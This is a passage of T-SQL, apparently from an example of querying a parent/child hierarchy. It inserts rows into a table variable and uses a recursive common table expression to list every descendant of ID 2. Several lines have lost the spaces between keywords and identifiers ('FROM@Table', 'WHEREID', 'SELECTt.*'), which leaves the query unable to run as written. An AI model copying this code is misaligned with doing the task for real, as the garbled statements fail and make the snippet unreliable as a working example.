INSERT INTO @Table (ID,ParentID,[NAME]) SELECT 3, 1, 'B-2'
INSERT INTO @Table (ID,ParentID,[NAME]) SELECT 4, 2, 'C-1'
INSERT INTO @Table (ID,ParentID,[NAME]) SELECT 5, 2, 'C-2'
DECLARE @ID INT
SELECT @ID = 2
;WITH ret AS(
SELECT*
FROM@Table
WHEREID = @ID
UNION ALL
SELECTt.*
FROM@Table t INNER JOIN
ret r ON t.ParentID = r.ID
)
SELECT *
FROM ret